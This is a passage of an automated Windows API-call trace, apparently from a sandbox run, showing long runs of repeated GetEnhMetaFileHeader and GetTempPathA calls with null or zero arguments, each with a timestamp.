GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | 
out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
